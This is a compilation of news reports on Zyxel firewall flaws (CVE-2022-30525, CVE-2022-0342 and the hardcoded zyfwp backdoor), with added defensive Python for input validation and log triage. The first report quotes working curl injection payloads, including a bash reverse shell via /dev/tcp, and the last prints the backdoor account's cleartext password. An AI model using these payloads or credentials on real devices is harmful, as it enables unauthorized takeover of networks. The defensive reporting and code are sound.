Zyxel silently patches command injection vulnerability with 9.8 severity rating

Hardware manufacturer Zyxel quietly released an update fixing a critical vulnerability that gives hackers the ability to control tens of thousands of firewall devices remotely.

The vulnerability, which allows remote command injection with no authentication required, carries a severity rating of 9.8 out of a possible 10. It is easy to exploit: a single crafted HTTP or HTTPS request to an affected device is enough. With such requests an attacker can run commands on the firewall or spawn a shell that gives them persistent, though unprivileged, access to the device over time.

High-value, easy to weaponize, requires no authentication

The vulnerability affects a line of firewalls that offer a feature known as zero-touch provisioning (ZTP). Zyxel markets the devices for small-branch and corporate-headquarters deployments. The devices provide VPN connectivity, SSL inspection, web filtering, intrusion protection, and email security, with up to 5 Gbps of firewall throughput. The Shodan device search service shows more than 16,000 affected devices exposed to the Internet.

The specific devices affected are:

Affected model                          Affected firmware version
USG FLEX 100, 100W, 200, 500, 700       ZLD5.00 through ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN                   ZLD5.10 through ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800             ZLD5.10 through ZLD5.21 Patch 1

The vulnerability is tracked as CVE-2022-30525. Rapid7, the security firm that discovered it and privately reported it to Zyxel, said that the VPN series of the devices also support ZTP, but they’re not vulnerable because they don’t include other required functionality. In an advisory published Thursday, Rapid7 researcher Jake Baines wrote:

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI and is the result of passing unsanitized attacker input into the os.system method in lib_wan_settings.py. The vulnerable functionality is invoked in association with the setWanPortSt command. An attacker can inject arbitrary commands into the mtu or the data parameter.

Below are examples of (1) a curl request that causes the firewall to execute a ping to an attacker-chosen IP address (the address has been omitted from the command), followed by (2) the ps process listing on the firewall showing the injected command running under the nobody user, (3) a curl request that spawns a reverse shell (the listener address and port are likewise omitted), and (4) what a hacker can do with that reverse shell:

    1. curl -v --insecure -X POST -H "Content-Type: application/json" -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
      :"1","vlanid":"5","mtu":"; ping;","data":"hi"}'
    2. nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
      nobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      nobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping; 5 >/dev/null 2>&1
      nobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \_ ping
    3. curl -v --insecure -X POST -H "Content-Type: application/json" -d '
      {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged": "1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/ <&1;\";","data":"hi"}'
    4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 1270
      Connection received on 37882
      bash: cannot set terminal process group (11037): Inappropriate ioctl for device
      bash: no job control in this shell
      bash-5.1$ id
      uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux

Rapid7 has developed a module for the Metasploit exploit framework that automates the exploitation process.
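The bug class Baines describes, unsanitized request fields spliced into an os.system() call, is illustrated below as an added example. This is not Zyxel's lib_wan_settings.py and not Rapid7's exploit code: the command template is an assumption reconstructed from the ps listing above (sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping; 5 >/dev/null 2>&1), the argument meanings and ranges are guesses, and the request bodies are constructed. The example shows the vulnerable string-building side by side with a hardened version that validates each field and runs the helper without a shell, plus a small triage check that a proxy, WAF or log reviewer can apply to captured POST bodies.

```python
import json
import subprocess

# Constructed illustration of CVE-2022-30525's bug class; NOT Zyxel's code.
# Command shape is an assumption taken from the ps output on this page.
SDWAN_IPC = "/usr/sbin/sdwan_iface_ipc"
SHELL_META = set(";|&`$<>(){}\n\r")


def vulnerable_command(params):
    """Build the string an os.system()-style handler would hand to /bin/sh.

    "port", "mtu" and "vlanid" are spliced in verbatim, so a ';' inside mtu
    terminates the intended command and starts an attacker-chosen one.
    The string is returned, not executed, so it can be inspected safely.
    """
    return "%s 11 WAN3 %s %s %s >/dev/null 2>&1" % (
        SDWAN_IPC, params["port"], params["mtu"], params["vlanid"])


def validated_argv(params):
    """Hardened equivalent: coerce every field to an integer, range-check it,
    and return an argv list for shell-free execution. Raises ValueError on
    anything that is not a plain number in range (assumed ranges)."""
    port = int(params["port"])
    mtu = int(params["mtu"])
    vlanid = int(params["vlanid"])
    if not 1 <= port <= 8:            # assumed physical-port index range
        raise ValueError("port out of range")
    if not 576 <= mtu <= 9000:        # usual Ethernet MTU envelope
        raise ValueError("mtu out of range")
    if not 1 <= vlanid <= 4094:       # valid 802.1Q VLAN IDs
        raise ValueError("vlanid out of range")
    return [SDWAN_IPC, "11", "WAN3", str(port), str(mtu), str(vlanid)]


def is_rejected(params):
    """True when the hardened validator refuses the request."""
    try:
        validated_argv(params)
    except ValueError:
        return True
    return False


def run_hardened(params):
    """Execute with shell=False: metacharacters in arguments are inert."""
    return subprocess.run(validated_argv(params), shell=False, check=False,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def looks_like_ztp_injection(body):
    """Triage a captured request body to /ztp/cgi-bin/handler: True when a
    setWanPortSt command carries shell metacharacters in the two fields Rapid7
    identified as injectable (mtu and data)."""
    try:
        req = json.loads(body)
    except ValueError:
        return False
    if req.get("command") != "setWanPortSt":
        return False
    for key in ("mtu", "data"):
        if any(c in SHELL_META for c in str(req.get(key, ""))):
            return True
    return False


# Constructed request bodies: a benign one and the ping payload shown above.
BENIGN = ('{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1",'
          '"vlanid":"5","mtu":"1500","data":"hi"}')
EXPLOIT = ('{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1",'
           '"vlanid":"5","mtu":"; ping;","data":"hi"}')

if __name__ == "__main__":
    print(vulnerable_command(json.loads(EXPLOIT)))
    print(validated_argv(json.loads(BENIGN)))
    print(is_rejected(json.loads(EXPLOIT)))
    print(looks_like_ztp_injection(EXPLOIT), looks_like_ztp_injection(BENIGN))
```

The string produced by vulnerable_command() for the exploit body is exactly the command line visible in the ps listing, which is why the fix is not to strip characters but to stop treating client input as shell text at all: integer coercion plus an argv list with shell=False leaves nothing for the shell to interpret.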

Baines said that Rapid7 notified Zyxel of the vulnerability on April 13 and that the two parties agreed to provide a coordinated disclosure, including the fix, on June 21. The researcher went on to say that unbeknownst to Rapid7, the hardware manufacturer released a firmware update on April 28 that quietly fixed the vulnerability. Zyxel only obtained the CVE number on Tuesday, after Rapid7 asked about the silent patch, and published an advisory on Thursday.

According to AttackerKB, a resource on security vulnerabilities, CVE-2022-30525 is of high value to threat actors because it’s easy to weaponize, requires no authentication, and can be exploited in the default setup of vulnerable devices. Rapid7 representatives weren’t available to answer basic questions about the accuracy of that assessment.

Administrators must manually apply the patch unless they have changed default settings to allow automatic updating. Early indications are that the patch hasn’t been widely deployed, as a Shodan query for just one of the vulnerable firewalls, the ATP200, showed that only about 25 percent of exposed devices were running the latest firmware.

Vulnerabilities affecting firewalls can be especially severe because they sit at the outer edge of networks where incoming and outgoing traffic flows. Many firewalls can also read data before it’s encrypted. Administrators who oversee networks that use these affected devices should prioritize investigating their exposure to this vulnerability and patch accordingly.


Zyxel patches critical vulnerability that can allow Firewall and VPN hijacks


Hardware manufacturer Zyxel has issued patches for a highly critical security flaw that gives malicious hackers the ability to take control of a wide range of firewalls and VPN products the company sells to businesses.

The flaw is an authentication bypass vulnerability that stems from a lack of a proper access-control mechanism in the CGI (common gateway interface) of affected devices, the company said. Access control refers to a set of policies that rely on passwords and other forms of authentication to ensure resources or data are available only to authorized people. The vulnerability is tracked as CVE-2022-0342.

“The flaw could allow an attacker to bypass the authentication and obtain administrative access of the device,” Zyxel said in an advisory. The severity rating is 9.8 out of a possible 10.

The vulnerability is present in the following devices:

Affected series   Affected firmware version         Patch availability
USG/ZyWALL        ZLD V4.20 through ZLD V4.70       ZLD V4.71
USG FLEX          ZLD V4.50 through ZLD V5.20       ZLD V5.21 Patch 1
ATP               ZLD V4.32 through ZLD V5.20       ZLD V5.21 Patch 1
VPN               ZLD V4.30 through ZLD V5.20       ZLD V5.21
NSG               V1.20 through V1.33 Patch 4       Hotfix V1.33p4_WK11* available now; standard patch V1.33 Patch 5 in May 2022

The advisory comes after other hardware makers have recently reported their products have similar vulnerabilities that are actively being exploited in the wild. Sophos, for instance, said that an authentication bypass vulnerability allowing remote code execution was recently fixed in the Sophos Firewall v18.5 MR3 (18.5.3) and older. CVE-2022-1040 was already being used to target companies, primarily in Asia.

Trend Micro also warned that hackers were exploiting a vulnerability in its Trend Micro Apex Central that made it possible to upload and execute malicious files. The flaw is tracked as CVE-2022-26871.

Zyxel credited the discovery of CVE-2022-0342 to Alessandro Sgreccia from Tecnical Service SrL and Roberto Garcia H and Victor Garcia R from Innotec Security. There are no known reports of the vulnerabilities being actively exploited.


Hackers are exploiting a backdoor built into Zyxel devices. Are you patched?


Hackers are attempting to exploit a recently discovered backdoor built into multiple Zyxel device models that hundreds of thousands of individuals and businesses use as VPNs, firewalls, and wireless access points.

The backdoor comes in the form of an undocumented user account with full administrative rights that’s hardcoded into the device firmware, a researcher from Netherlands-based security firm Eye Control recently reported. The account, which uses the username zyfwp, can be accessed over either SSH or through a Web interface.

A serious vulnerability

The researcher warned that the account put users at considerable risk, particularly if it were used to exploit other vulnerabilities such as Zerologon, a critical Windows flaw that allows attackers to instantly become all-powerful network administrators.

“As the zyfwp user has admin privileges, this is a serious vulnerability,” Eye Control researcher Niels Teusink wrote. “An attacker could completely compromise the confidentiality, integrity and availability of the device. Someone could for example change firewall settings to allow or block certain traffic. They could also intercept traffic or create VPN accounts to gain access to the network behind the device. Combined with a vulnerability like Zerologon this could be devastating to small and medium businesses.”

Andrew Morris, founder and CEO of security firm GreyNoise, said on Monday that his company’s sensors have detected automated attacks that are using the account credentials in an attempt to log in to vulnerable devices. In most or all of the login attempts, the attackers have simply added the credentials to existing lists of default username/password combinations used to hack into unsecured routers and other types of devices.

“By definition, anything we’re seeing has to be opportunistic,” Morris said, meaning the attackers are using the credentials against IP addresses in a pseudorandom manner in hopes of finding connected devices that are susceptible to takeover. GreyNoise deploys collection sensors in hundreds of data centers worldwide to monitor Internetwide scanning and exploitation attempts.

The login attempts GreyNoise is seeing are happening over SSH connections, but Eye Control researcher Teusink said the undocumented account can also be accessed using a Web interface. The researcher said that a recent scan showed that more than 100,000 Zyxel devices have exposed the Web interface to the Internet.
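A defender watching for the opportunistic SSH attempts GreyNoise describes can triage them from authentication logs. The following is an added example, not code from Eye Control, GreyNoise or Zyxel. It assumes the firewall, or a syslog collector in front of it, emits OpenSSH-style authentication lines; the log lines are constructed, with RFC 5737 documentation addresses standing in for scanners. Besides counting attempts per source and flagging any successful login with the zyfwp username, it uses a detail of OpenSSH's log format: the words "invalid user" appear only when no such local account exists, so a plain "Failed password for zyfwp" line tells you the backdoor account is present on that host.

```python
import re
from collections import Counter

# Added detection example; assumes OpenSSH-style auth lines (see lead-in).
BACKDOOR_USER = "zyfwp"

_SSH_AUTH = re.compile(
    r"^\w{3}\s+\d+\s+[\d:]+\s+(?P<host>\S+)\s+sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?P<invalid>invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_ssh_auth(line):
    """Return the fields of one sshd Accepted/Failed line, or None."""
    m = _SSH_AUTH.search(line)
    if not m:
        return None
    return {
        "host": m.group("host"),
        "result": m.group("result"),
        "user": m.group("user"),
        "src": m.group("src"),
        "invalid": bool(m.group("invalid")),   # "invalid user" => no such account
    }


def triage_backdoor_logins(lines, user=BACKDOOR_USER):
    """Summarise attempts against the backdoor username.

    attempts:        per-source count of logins tried with that username
    accepted_from:   sources that actually got in (treat as compromised)
    account_present: per host, whether sshd ever logged the name WITHOUT
                     "invalid user", i.e. the account exists on that host
    """
    attempts = Counter()
    accepted = set()
    account_present = {}
    for line in lines:
        ev = parse_ssh_auth(line)
        if ev is None or ev["user"] != user:
            continue
        attempts[ev["src"]] += 1
        if ev["result"] == "Accepted":
            accepted.add(ev["src"])
        seen = account_present.get(ev["host"], False)
        account_present[ev["host"]] = seen or not ev["invalid"]
    return {
        "attempts": dict(attempts),
        "accepted_from": sorted(accepted),
        "account_present": account_present,
    }


# Constructed sample: usg-fw1 still has the account (and one login succeeds),
# usg-fw2 rejects the name as an unknown user.
SAMPLE_LOG = [
    "Jan  4 10:12:01 usg-fw1 sshd[2211]: Failed password for zyfwp from 203.0.113.7 port 51122 ssh2",
    "Jan  4 10:12:03 usg-fw1 sshd[2215]: Accepted password for zyfwp from 203.0.113.7 port 51130 ssh2",
    "Jan  4 10:12:05 usg-fw1 sshd[2219]: Failed password for admin from 198.51.100.2 port 40001 ssh2",
    "Jan  4 10:12:06 usg-fw1 sshd[2220]: Failed password for zyfwp from 198.51.100.9 port 40010 ssh2",
    "Jan  4 10:12:09 usg-fw2 sshd[3131]: Failed password for invalid user zyfwp from 192.0.2.33 port 40020 ssh2",
    "Jan  4 10:12:10 usg-fw2 sshd[3132]: pam_unix(sshd:auth): authentication failure; logname= uid=0",
]

if __name__ == "__main__":
    for key, value in triage_backdoor_logins(SAMPLE_LOG).items():
        print(key, value)
```

An "Accepted" line for zyfwp from any source is the finding that matters: the device should be treated as compromised, not merely patched. The web interface Teusink mentions is a second login path that this SSH-only parser does not cover.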

Teusink said the backdoor appears to have been introduced in firmware version 4.60, which was released a few weeks earlier. A scan of Zyxel devices in the Netherlands showed that about 10 percent of them were running that vulnerable version. Zyxel has issued a security advisory noting the specific device models that are affected. They include:

Firewalls

  • ATP series running firmware ZLD V4.60
  • USG series running firmware ZLD V4.60
  • USG FLEX series running firmware ZLD V4.60
  • VPN series running firmware ZLD V4.60

AP controllers

  • NXC2500 running firmware V6.00 through V6.10
  • NXC5500 running firmware V6.00 through V6.10

For firewall models, a fix is already available. AP controllers, meanwhile, are scheduled to receive a fix on Friday. Zyxel said it designed the backdoor to deliver automatic firmware updates to connected access points over FTP.

People who use one of these affected devices should be sure to install a security fix as soon as it becomes available. Even when devices are running a version predating 4.6, users should still install the update, since it fixes separate vulnerabilities found in earlier releases. Disabling remote administration is also a good idea unless there is a good reason for allowing it.


There is a backdoor in thousands of Zyxel products

The "hidden" account makes it possible to take control of the device with root-level privileges. And the credentials were visible in the firmware...

2020 was a real ordeal for firewall and VPN makers, targeted by hacking groups that exploited the (far too many) vulnerabilities that surfaced over the course of the year.

The last blow of the past year confirms the trend and involves Zyxel, whose products are vulnerable to remote attacks because of a backdoor "forgotten" by the developers.

The security flaw (CVE-2020-29583) was announced by the company itself in a report published online, together with the release of a patch that fixes it.

As the report explains, it is in fact an administrative account used to install firmware updates on the devices, which relies on credentials (username "zyfwp"; password "PrOw!aN_fXp") stored in the code of the management software.

What makes the bug particularly dangerous is that the credentials granting remote access are easy to recover. As EYE's researchers explain in a report published on 23 December, the username and password were embedded, in cleartext, in the software's code.

Consequently, anyone could have accessed the vulnerable appliances with administrator privileges. The full list of affected models is summarized in the table in Zyxel's advisory. According to EYE's researchers, more than 100,000 of the devices exposed on the Internet are vulnerable to the attack.

A very delicate phase now begins, in which every company and organization using one of the listed products must move as quickly as possible to update the firmware and "plug" the backdoor.

Given that we are in the middle of the Christmas holidays, though, it is hard to imagine a worse moment to be handling a situation that could turn into a genuine emergency.

As if that were not enough, updates for the Zyxel AP controllers (NXC2500 and NXC5500) are not yet available and will only be released on 8 January.
